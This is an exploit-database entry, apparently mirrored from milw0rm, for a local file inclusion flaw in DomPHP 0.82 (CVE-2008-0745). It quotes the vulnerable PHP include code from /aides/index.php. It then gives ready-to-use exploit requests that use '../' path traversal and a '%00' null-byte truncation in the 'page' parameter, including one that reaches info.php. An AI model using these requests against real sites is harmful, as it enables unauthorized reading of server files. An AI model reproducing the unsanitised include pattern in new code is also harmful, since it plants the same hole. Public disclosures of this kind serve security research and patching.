[] NeoSense
E X P L O I T S
title author type platform port cve id

DomPHP 0.82 - 'index.php' Local File Inclusion

Author: Houssamix
type: webapps
platform: php
port: 
date_added: 2008-02-08 
date_updated:  
verified: 1 
codes: OSVDB-41555;CVE-2008-0745 
tags: 
aliases:  
screenshot_url:  
application_url: 
-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------

= Author : HouSSaMix From H-T Team

= Script : DomPHP 0.82
= Download :  http://www.domphp.com/download/

= BUG : Local File Inclusion

=  Vulnerable CODE :
~~~~~~~~~ /aides/index.php ~~~~~~~~~~~~~~~~~~~~~~
if (isset($_GET['page'])) {
	// On supprime le http:// si tentative de fraude.
	$page = str_replace("http://","",$_GET['page']);
	include("../aides/".$page.".html");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

= Exploit :
http://Target/[path]/aides/index.php?page=[LFI]%00

= Get phpinfo =>  http://Target/[path]/info.php
                http://Target/[path]/aides/index.php?page=../info.php%00

-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------

# milw0rm.com [2008-02-09]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.